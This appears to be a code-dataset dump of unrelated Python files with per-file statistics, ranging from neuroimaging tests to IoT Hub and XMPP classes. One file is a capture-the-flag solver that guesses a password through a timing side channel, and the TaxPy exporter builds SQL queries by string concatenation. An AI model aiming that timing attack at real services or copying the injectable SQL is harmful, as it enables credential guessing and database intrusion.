def normalize_one_file(self, path, crystal_contact_res_set):
cmd = 'select crystal_contact_res,'
for res in crystal_contact_res_set:
cmd += ' res {0} and chain {1}'.format(res[1], res[0])
with open(path, 'w') as f:
f.write(cmd)
def apply(self, info_dict):
for structure_dict in info_dict['candidate_list']:
d = os.path.dirname(structure_dict['path'])
n = '.'.join([structure_dict['name']+'_show_crystal_contact', 'pml'])
if 'crystal_contact_res_set' in structure_dict.keys():
self.normalize_one_file(os.path.join(d, n), structure_dict['crystal_contact_res_set'])
| 31.62069 | 94 | 0.691385 | 122 | 917 | 4.92623 | 0.5 | 0.139767 | 0.141431 | 0.133111 | 0.076539 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005413 | 0.194111 | 917 | 28 | 95 | 32.75 | 0.807848 | 0.123228 | 0 | 0 | 0 | 0 | 0.181013 | 0.08481 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0.058824 | 0.117647 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0cac9d083e4dfd2daccd29d3da4102e79f646255 | 1,919 | py | Python | neurovault/apps/statmaps/tests/test_qa.py | abitrolly/NeuroVault | e62bc65c8e0e58bff55bb9fa7cf11193dc54d734 | [
"MIT"
] | 68 | 2015-02-07T06:09:49.000Z | 2022-03-03T22:58:33.000Z | neurovault/apps/statmaps/tests/test_qa.py | abitrolly/NeuroVault | e62bc65c8e0e58bff55bb9fa7cf11193dc54d734 | [
"MIT"
] | 436 | 2015-01-01T01:01:13.000Z | 2021-11-07T18:24:00.000Z | neurovault/apps/statmaps/tests/test_qa.py | abitrolly/NeuroVault | e62bc65c8e0e58bff55bb9fa7cf11193dc54d734 | [
"MIT"
] | 60 | 2015-01-10T23:31:26.000Z | 2021-08-10T06:39:57.000Z | import os
import nibabel as nb
import numpy as np
from django.test import TestCase
from neurovault.apps.statmaps.models import BaseStatisticMap
from neurovault.apps.statmaps.utils import is_thresholded, infer_map_type
class QATest(TestCase):
def setUp(self):
this_path = os.path.abspath(os.path.dirname(__file__))
self.brain = nb.load(os.path.join(this_path, "../static", "anatomical", "MNI152.nii.gz"))
self.roi_map = nb.load(os.path.join(this_path, "test_data", "statmaps", "WA3.nii.gz"))
self.parcellation = nb.load(os.path.join(this_path, "test_data", "TTatlas.nii.gz"))
# We will fill in brain mask with this percentage of randomly placed values
self.ratios = [0.0,0.1,0.15,0.2,0.25,0.3,0.4,0.5,0.6,0.96, 0.98]
self.thresholded = [False,False,False,False,False,False,False,False,False,True,True]
def testThresholded(self):
for p,t in zip(self.ratios, self.thresholded):
empty_data = np.ones(self.brain.shape)
if p != 0.0:
number_voxels = int(np.floor(p * empty_data.size))
random_idx = np.random.choice(range(empty_data.size), number_voxels, replace=False)
empty_data[np.unravel_index(random_idx, empty_data.shape)] = 0
empty_nii = nb.Nifti1Image(empty_data,affine=self.brain.get_affine(),header=self.brain.get_header())
is_thr, ratio_bad = is_thresholded(nii_obj=empty_nii)
print "Zeroed %s of values, is_thresholded returns [%s:%s]" %(p,is_thr,ratio_bad)
self.assertAlmostEqual(p, ratio_bad, delta=0.001)
self.assertEquals(t, is_thr)
def testInferMapType(self):
self.assertEquals(infer_map_type(self.roi_map), BaseStatisticMap.R)
self.assertEquals(infer_map_type(self.parcellation), BaseStatisticMap.Pa)
self.assertEquals(infer_map_type(self.brain), BaseStatisticMap.OTHER) | 50.5 | 112 | 0.684211 | 283 | 1,919 | 4.480565 | 0.392226 | 0.063091 | 0.082808 | 0.094637 | 0.180599 | 0.180599 | 0.10489 | 0.085962 | 0.050473 | 0 | 0 | 0.024422 | 0.189161 | 1,919 | 38 | 113 | 50.5 | 0.790488 | 0.038041 | 0 | 0 | 0 | 0 | 0.072087 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | null | null | 0 | 0.2 | null | null | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0caeebf4e3ed3af12c71f32665fdf047f4676dd8 | 497 | py | Python | backend/app/utils.py | dashdashforce/int20h-test-photo-viewer | 1720ec2c30685eac9d1e5ef9ecf3d389239ee566 | [
"MIT"
] | null | null | null | backend/app/utils.py | dashdashforce/int20h-test-photo-viewer | 1720ec2c30685eac9d1e5ef9ecf3d389239ee566 | [
"MIT"
] | 20 | 2019-02-04T21:57:59.000Z | 2019-02-10T21:50:17.000Z | backend/app/utils.py | dashdashforce/int20h-test-photo-viewer | 1720ec2c30685eac9d1e5ef9ecf3d389239ee566 | [
"MIT"
] | null | null | null |
from functools import reduce
from itertools import groupby
from operator import add, itemgetter
def merge_records_by(key, combine):
return lambda first, second: {
k: first[k] if k == key else combine(first[k], second[k])
for k in first
}
def merge_list_of_records_by(key, combine):
keyprop = itemgetter(key)
return lambda lst: [
reduce(merge_records_by(key, combine), records)
for _, records in groupby(sorted(lst, key=keyprop), keyprop)
]
| 24.85 | 68 | 0.682093 | 69 | 497 | 4.782609 | 0.42029 | 0.081818 | 0.109091 | 0.172727 | 0.145455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227364 | 497 | 19 | 69 | 26.157895 | 0.859375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.214286 | 0.071429 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cb93959fe2a17c6bba6b5049a41d091d98ecf1d | 1,174 | py | Python | slixmpp/plugins/xep_0421/stanza.py | cnngimenez/slixmpp | bb61f0f39dfba205282dab50c0f3a47b26145c74 | [
"BSD-3-Clause"
] | null | null | null | slixmpp/plugins/xep_0421/stanza.py | cnngimenez/slixmpp | bb61f0f39dfba205282dab50c0f3a47b26145c74 | [
"BSD-3-Clause"
] | null | null | null | slixmpp/plugins/xep_0421/stanza.py | cnngimenez/slixmpp | bb61f0f39dfba205282dab50c0f3a47b26145c74 | [
"BSD-3-Clause"
] | null | null | null | """
Slixmpp: The Slick XMPP Library
Copyright (C) 2020 "Maxime “pep” Buquet <pep@bouah.net>"
This file is part of Slixmpp.
See the file LICENSE for copying permission.
"""
from slixmpp.xmlstream import ElementBase
NS = 'urn:xmpp:occupant-id:0'
class OccupantId(ElementBase):
'''
An Occupant-id tag.
An <occupant-id/> tag is set by the MUC.
This is useful in semi-anon MUCs (and MUC-PMs) as a stable identifier to
prevent the usual races with nicknames.
Without occupant-id, getting the following messages from MUC history would
prevent a client from asserting senders are the same entity:
<message type='groupchat' from='foo@muc/nick1' id='message1'>
<body>Some message</body>
<occupant-id xmlns='urn:xmpp:occupant-id:0' id='unique-opaque-id1'/>
</message>
<message type='groupchat' from='foo@muc/nick2' id='message2'>
<body>Some correction</body>
<occupant-id xmlns='urn:xmpp:occupant-id:0' id='unique-opaque-id1'/>
<replace xmlns='urn:xmpp:message-correct:0' id='message1'/>
</message>
'''
name = 'occupant-id'
namespace = NS
interface = {'id'}
| 28.634146 | 78 | 0.663543 | 164 | 1,174 | 4.75 | 0.536585 | 0.115533 | 0.057766 | 0.065469 | 0.238768 | 0.215661 | 0.138639 | 0.138639 | 0.138639 | 0.138639 | 0 | 0.016181 | 0.210392 | 1,174 | 40 | 79 | 29.35 | 0.824164 | 0.764055 | 0 | 0 | 0 | 0 | 0.192308 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0cbd80d538ed5aeecd342647472ca2c49593352a | 3,110 | py | Python | TaxPy/data_processing/export_reads.py | stenglein-lab/TaxAssessor | 144599d1395627c4e86ab68a4d6d3e0785e606f0 | [
"MIT"
] | null | null | null | TaxPy/data_processing/export_reads.py | stenglein-lab/TaxAssessor | 144599d1395627c4e86ab68a4d6d3e0785e606f0 | [
"MIT"
] | 2 | 2016-11-29T19:48:27.000Z | 2016-12-09T17:18:56.000Z | TaxPy/data_processing/export_reads.py | stenglein-lab/TaxAssessor | 144599d1395627c4e86ab68a4d6d3e0785e606f0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import json
import timeit
import re
import TaxPy.db_management.db_wrap as TaxDb
from itertools import izip
def retrieveReads(userName,fileName,fileId,parentTaxId,query):
time1 = timeit.default_timer()
taxTree = loadTaxTree(userName,fileName)
time2 = timeit.default_timer()
print str(time2-time1)+" seconds loading tree"
status,subTree = findSubTree(taxTree,parentTaxId)
time3 = timeit.default_timer()
print str(time3-time2)+" finding subtree"
children = findChildren(subTree,[])
time4 = timeit.default_timer()
print str(time4-time3)+" finding children"
readLines,status = getReadLines(children,fileId,query)
time5 = timeit.default_timer()
print str(time5-time4)+" getting read lines"
return readLines,status
def findSubTree(tree,parentTaxId,found=False):
subTree = None
if int(tree["taxId"]) == int(parentTaxId) or found:
return True,tree
try:
for child in tree["children"]:
found,subTree = findSubTree(child,parentTaxId)
if found:
return True,subTree
except KeyError:
pass
return found,subTree
def findChildren(tree,children):
children.append(tree["taxId"])
try:
for child in tree["children"]:
children = findChildren(child,children)
except KeyError:
pass
return children
def loadTaxTree(userName,fileName):
jsonFile = "uploads/"+userName+"/"+fileName+"_tree.json"
with open(jsonFile,"r") as inFile:
taxTree = json.load(inFile)
return taxTree
def getReadLines(children,fileId,query):
readLines = []
count = 0
with TaxDb.openDbSS("TaxAssessor_Alignments") as db, \
TaxDb.cursor(db) as cur:
cmd = "SELECT COUNT(*) FROM "+fileId+" WHERE taxId IN "
children = "("+str(children).lstrip("[").rstrip("]")+")"
cmd += children
cur.execute(cmd)
nRows = cur.fetchall()[0][0]
cmd = "SELECT "+query+" FROM "+fileId+" WHERE taxId IN "
cmd += children + ";"
cur.execute(cmd)
for line in cur:
readLines.append(line[0])
return readLines,str(nRows)
def getReadsForTaxIds(userName,fileName,fileId,taxIds,query):
readLines = []
count = 0
with TaxDb.openDbSS("TaxAssessor_Alignments") as db, \
TaxDb.cursor(db) as cur:
cmd = "SELECT "+query+" FROM "+fileId+" WHERE taxId IN (%s)"
in_p=', '.join(map(lambda x: '%s', taxIds))
cmd = cmd % in_p
cur.execute(cmd,taxIds)
for line in cur:
readLines.append(line[0])
return readLines
def getReadsForGiInTaxId(userName,fileName,fileId,taxId,seqId,query):
readLines = []
count = 0
with TaxDb.openDbSS("TaxAssessor_Alignments") as db, \
TaxDb.cursor(db) as cur:
cmd = "SELECT "+query+" FROM "+fileId+" WHERE taxId=%s AND seqId=%s"
cur.execute(cmd,(taxId,seqId))
for line in cur:
readLines.append(line[0])
return readLines
| 27.280702 | 76 | 0.618971 | 355 | 3,110 | 5.385915 | 0.278873 | 0.050209 | 0.047071 | 0.048117 | 0.376569 | 0.285565 | 0.259414 | 0.259414 | 0.23954 | 0.23954 | 0 | 0.009142 | 0.261415 | 3,110 | 113 | 77 | 27.522124 | 0.823248 | 0.005145 | 0 | 0.361446 | 0 | 0 | 0.107986 | 0.021339 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.024096 | 0.060241 | null | null | 0.048193 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cc0bf99ee01e613b032f7efe713db47ddaef6b6 | 1,137 | py | Python | ossdbtoolsservice/metadata/contracts/object_metadata.py | DaeunYim/pgtoolsservice | b7e548718d797883027b2caee2d4722810b33c0f | [
"MIT"
] | 33 | 2019-05-27T13:04:35.000Z | 2022-03-17T13:33:05.000Z | ossdbtoolsservice/metadata/contracts/object_metadata.py | DaeunYim/pgtoolsservice | b7e548718d797883027b2caee2d4722810b33c0f | [
"MIT"
] | 31 | 2019-06-10T01:55:47.000Z | 2022-03-09T07:27:49.000Z | ossdbtoolsservice/metadata/contracts/object_metadata.py | DaeunYim/pgtoolsservice | b7e548718d797883027b2caee2d4722810b33c0f | [
"MIT"
] | 25 | 2019-05-13T18:39:24.000Z | 2021-11-16T03:07:33.000Z | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import enum
from typing import Optional
from ossdbtoolsservice.serialization import Serializable
class MetadataType(enum.Enum):
"""Contract enum for representing metadata types"""
TABLE = 0
VIEW = 1
SPROC = 2
FUNCTION = 3
class ObjectMetadata(Serializable):
"""Database object metadata"""
@classmethod
def get_child_serializable_types(cls):
return {'metadata_type': MetadataType}
def __init__(self, urn: str = None, metadata_type: MetadataType = None, metadata_type_name: str = None, name: str = None, schema: Optional[str] = None):
self.metadata_type: MetadataType = metadata_type
self.metadata_type_name: str = metadata_type_name
self.name: str = name
self.schema: str = schema
self.urn: str = urn
| 34.454545 | 156 | 0.591029 | 116 | 1,137 | 5.646552 | 0.5 | 0.128244 | 0.109924 | 0.058015 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004278 | 0.177661 | 1,137 | 32 | 157 | 35.53125 | 0.696257 | 0.358839 | 0 | 0 | 0 | 0 | 0.018182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.166667 | 0.055556 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0cc52afa5bda9e011a3f67aa407ce29b267af421 | 1,409 | py | Python | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | Unit 7 Objects/LessonQ33.1.py | ItsMrTurtle/PythonChris | 4513dea336e68f48fabf480ad87bc538a323c2cd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed May 27 18:48:24 2020
@author: Christopher Cheng
"""
class Stack(object):
def __init__ (self):
self.stack = []
def get_stack_elements(self):
return self.stack.copy()
def add_one(self, item):
self.stack.append(item)
def add_many(self,item,n): # item is still a single string, n times
for i in range (n):
self.stack.append(item)
def remove_one(self):
self.stack.pop()
def remove_many(self,n):
for i in range(n):
self.stack.pop()
def size(self):
return len(self.stack)
def prettyprint(self):
for thing in self.stack[::-1]:
print("|_", thing,"_|")
def add_list(self, L):
for e in L:
self.stack.append(e)
def __str__ (self):
ret = ""
for thing in self.stack[::-1]:
ret += ("|_" + str(thing) + "_|\n")
return ret
class Circle (object):
def __init__(self):
self.radius = 0
def change_radius(self, radius):
self.radius = radius
def get_radius (self):
return self.radius
def __str__(self):
return "circle: " + str(self.radius)
circles = Stack()
one_circle = Circle()
one_circle.change_radius(1)
circles.add_one(one_circle)
two_circle = Circle()
two_circle.change_radius(2)
circles.add_one(two_circle)
print(circles) | 26.092593 | 71 | 0.581973 | 193 | 1,409 | 4.046632 | 0.316062 | 0.115237 | 0.057618 | 0.043534 | 0.203585 | 0.104994 | 0.053777 | 0 | 0 | 0 | 0 | 0.017822 | 0.28318 | 1,409 | 54 | 72 | 26.092593 | 0.755446 | 0.088715 | 0 | 0.266667 | 0 | 0 | 0.014107 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.311111 | false | 0 | 0 | 0.088889 | 0.466667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cc75fc2057f1d904d4d63b853c8dc9ff11fc8ab | 987 | py | Python | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | featureflags/config.py | enverbisevac/ff-python-server-sdk | e7c809229d13517e0bf4b28fc0a556e693c9034e | [
"Apache-2.0"
] | null | null | null | """Configuration is a base class that has default values that you can change
during the instance of the client class"""
from typing import Callable
BASE_URL = "https://config.feature-flags.uat.harness.io/api/1.0"
MINUTE = 60
PULL_INTERVAL = 1 * MINUTE
class Config(object):
def __init__(self, base_url: str = BASE_URL,
pull_interval: int = PULL_INTERVAL,
cache: object = None,
store: object = None,
enable_stream: bool = False):
self.base_url = base_url
self.pull_interval = pull_interval
self.cache = cache
self.store = store
self.enable_stream = enable_stream
default_config = Config()
def with_base_url(base_url: str) -> Callable:
def func(config: Config) -> None:
config.base_url = base_url
return func
def with_stream_enabled(value: bool) -> Callable:
def func(config: Config) -> None:
config.enable_stream = value
return func
| 25.973684 | 76 | 0.64843 | 130 | 987 | 4.723077 | 0.415385 | 0.102606 | 0.053746 | 0.068404 | 0.120521 | 0.120521 | 0.120521 | 0 | 0 | 0 | 0 | 0.006897 | 0.265451 | 987 | 37 | 77 | 26.675676 | 0.84 | 0.114488 | 0 | 0.166667 | 0 | 0 | 0.058756 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.208333 | false | 0 | 0.041667 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cc7dbac1b53714dc8579ed543f77deb34610c57 | 1,705 | py | Python | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | null | null | null | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | 51 | 2018-01-24T05:53:15.000Z | 2022-01-13T00:44:24.000Z | src/users/management/commands/populate_tables.py | pimpale/BQuest-Backend | b32833ee5053db1c47fa28f57273632eae43a5cc | [
"MIT"
] | 3 | 2020-04-22T03:21:37.000Z | 2020-12-15T22:45:52.000Z | from django.core.management.base import BaseCommand
from users.models import Major, Minor, Course
from django.db import IntegrityError
from os import path
import json
class Command(BaseCommand):
def _create_majors(self):
base_path = path.dirname(__file__)
majors_path = path.abspath(path.join(base_path, "..", "..", "majors.json"))
with open(majors_path) as majors_file:
majors = json.load(majors_file)
for major in majors:
major_entry = Major(name=major)
try:
major_entry.save()
except IntegrityError:
pass
def _create_minors(self):
base_path = path.dirname(__file__)
minors_path = path.abspath(path.join(base_path, "..", "..", "minors.json"))
with open(minors_path) as minors_file:
minors = json.load(minors_file)
for minor in minors:
minor_entry = Minor(name=minor)
try:
minor_entry.save()
except IntegrityError:
pass
def _create_courses(self):
base_path = path.dirname(__file__)
courses_path = path.abspath(path.join(base_path, "..", "..", "courses.json"))
with open(courses_path) as courses_file:
courses = json.load(courses_file)
for course in courses:
course_entry = Course(name=course)
try:
course_entry.save()
except IntegrityError:
pass
def handle(self, *args, **kwargs):
self._create_majors()
self._create_minors()
self._create_courses() | 32.788462 | 85 | 0.567742 | 183 | 1,705 | 5.027322 | 0.240437 | 0.052174 | 0.03913 | 0.052174 | 0.319565 | 0.319565 | 0.192391 | 0 | 0 | 0 | 0 | 0 | 0.337243 | 1,705 | 52 | 86 | 32.788462 | 0.814159 | 0 | 0 | 0.27907 | 0 | 0 | 0.026964 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0.069767 | 0.116279 | 0 | 0.232558 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0ccb7361200b302e98746fb913273e875a9c713b | 593 | py | Python | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 25 | 2019-03-06T11:55:56.000Z | 2021-05-21T22:07:14.000Z | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 1 | 2020-06-25T07:27:15.000Z | 2020-06-25T07:27:15.000Z | 2019/06-hsctf/web-networked/solve.py | wani-hackase/wani-writeup | dd4ad0607d2f2193ad94c1ce65359294aa591681 | [
"MIT"
] | 1 | 2019-02-14T00:42:28.000Z | 2019-02-14T00:42:28.000Z | import requests
text = "0123456789abcdefghijklmnopqrstuvwxyz_}"
flag = "hsctf{"
for _ in range(30):
time = [0.1 for _ in range(38)]
for _ in range(5):
for i in range(38):
payload = {"password": flag + text[i]}
r = requests.post(
"https://networked-password.web.chal.hsctf.com", data=payload
)
response_time = r.elapsed.total_seconds()
time[i] += response_time
print(payload, " response time : ", response_time)
flag += text[time.index(max(time))]
print("flag is ", flag)
| 21.962963 | 77 | 0.563238 | 69 | 593 | 4.724638 | 0.492754 | 0.08589 | 0.092025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046117 | 0.305228 | 593 | 26 | 78 | 22.807692 | 0.745146 | 0 | 0 | 0 | 0 | 0 | 0.205734 | 0.064081 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.125 | 0.0625 | 0 | 0.0625 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0ccc2e5ca0664e29a1337110f68367598882b29e | 3,936 | py | Python | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | 1 | 2019-02-06T06:52:44.000Z | 2019-02-06T06:52:44.000Z | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | null | null | null | azure-iot-device/azure/iot/device/iothub/models/message.py | elhorton/azure-iot-sdk-python | 484b804a64c245bd92930c13b970ff86f868b5fe | [
"MIT"
] | 1 | 2019-12-17T17:50:43.000Z | 2019-12-17T17:50:43.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""This module contains a class representing messages that are sent or received.
"""
from azure.iot.device import constant
# TODO: Revise this class. Does all of this REALLY need to be here?
class Message(object):
"""Represents a message to or from IoTHub
:ivar data: The data that constitutes the payload
:ivar custom_properties: Dictionary of custom message properties
:ivar lock_token: Used by receiver to abandon, reject or complete the message
:ivar message id: A user-settable identifier for the message used for request-reply patterns. Format: A case-sensitive string (up to 128 characters long) of ASCII 7-bit alphanumeric characters + {'-', ':', '.', '+', '%', '_', '#', '*', '?', '!', '(', ')', ',', '=', '@', ';', '$', '''}
:ivar sequence_number: A number (unique per device-queue) assigned by IoT Hub to each message
:ivar to: A destination specified for Cloud-to-Device (C2D) messages
:ivar expiry_time_utc: Date and time of message expiration in UTC format
:ivar enqueued_time: Date and time a C2D message was received by IoT Hub
:ivar correlation_id: A property in a response message that typically contains the message_id of the request, in request-reply patterns
:ivar user_id: An ID to specify the origin of messages
:ivar ack: A feedback message generator. This property is used in C2D messages to request IoT Hub to generate feedback messages as a result of the consumption of the message by the device
:ivar content_encoding: Content encoding of the message data. Can be 'utf-8', 'utf-16' or 'utf-32'
:ivar content_type: Content type property used to route messages with the message-body. Can be 'application/json'
:ivar output_name: Name of the output that the is being sent to.
"""
def __init__(
self,
data,
message_id=None,
content_encoding="utf-8",
content_type="application/json",
output_name=None,
):
"""
Initializer for Message
:param data: The data that constitutes the payload
:param str message_id: A user-settable identifier for the message used for request-reply patterns. Format: A case-sensitive string (up to 128 characters long) of ASCII 7-bit alphanumeric characters + {'-', ':', '.', '+', '%', '_', '#', '*', '?', '!', '(', ')', ',', '=', '@', ';', '$', '''}
:param str content_encoding: Content encoding of the message data. Default is 'utf-8'. Other values can be utf-16' or 'utf-32'
:param str content_type: Content type property used to routes with the message body. Default value is 'application/json'
:param str output_name: Name of the output that the is being sent to.
"""
self.data = data
self.custom_properties = {}
self.lock_token = None
self.message_id = message_id
self.sequence_number = None
self.to = None
self.expiry_time_utc = None
self.enqueued_time = None
self.correlation_id = None
self.user_id = None
self.ack = None
self.content_encoding = content_encoding
self.content_type = content_type
self.output_name = output_name
self._iothub_interface_id = None
@property
def iothub_interface_id(self):
return self._iothub_interface_id
def set_as_security_message(self):
"""
Set the message as a security message.
This is a provisional API. Functionality not yet guaranteed.
"""
self._iothub_interface_id = constant.SECURITY_MESSAGE_INTERFACE_ID
def __str__(self):
return str(self.data)
| 50.461538 | 298 | 0.649644 | 520 | 3,936 | 4.796154 | 0.301923 | 0.040096 | 0.027265 | 0.036087 | 0.262229 | 0.252606 | 0.252606 | 0.194868 | 0.157979 | 0.157979 | 0 | 0.00718 | 0.221545 | 3,936 | 77 | 299 | 51.116883 | 0.806789 | 0.690041 | 0 | 0 | 0 | 0 | 0.020038 | 0 | 0 | 0 | 0 | 0.012987 | 0 | 1 | 0.125 | false | 0 | 0.03125 | 0.0625 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ccd4f9fbf2b5d4dda1cc40e475be33aa9ef28bc | 320 | py | Python | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | null | null | null | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | 5 | 2019-12-29T04:58:10.000Z | 2021-03-11T04:35:15.000Z | scraping/test001.py | flaviogf/Exemplos | fc666429f6e90c388e201fb7b7d5801e3c25bd25 | [
"MIT"
] | null | null | null | import pandas
import requests
with open('avengers.csv', 'w') as file:
file_url = 'https://raw.githubusercontent.com/fivethirtyeight/data/master/avengers/avengers.csv'
response = requests.get(file_url)
file.write(response.text)
with open('avengers.csv', 'r') as file:
data_frame = pandas.read_csv(file)
| 29.090909 | 100 | 0.73125 | 45 | 320 | 5.111111 | 0.555556 | 0.143478 | 0.13913 | 0.165217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13125 | 320 | 10 | 101 | 32 | 0.827338 | 0 | 0 | 0 | 0 | 0 | 0.340625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cdc773a241a8d2d5331293406b95caeb6731f44 | 926 | py | Python | tests/test_load_bin_log.py | bols-blue-org/pid_evaluation | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | 1 | 2020-08-27T06:30:53.000Z | 2020-08-27T06:30:53.000Z | tests/test_load_bin_log.py | bols-blue-org/ape | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | null | null | null | tests/test_load_bin_log.py | bols-blue-org/ape | af210f2ef7ca49681ff41f4531cfcbd83d70aca0 | [
"MIT"
] | null | null | null | import unittest
from ape.load_bin_log import LoadBinLog
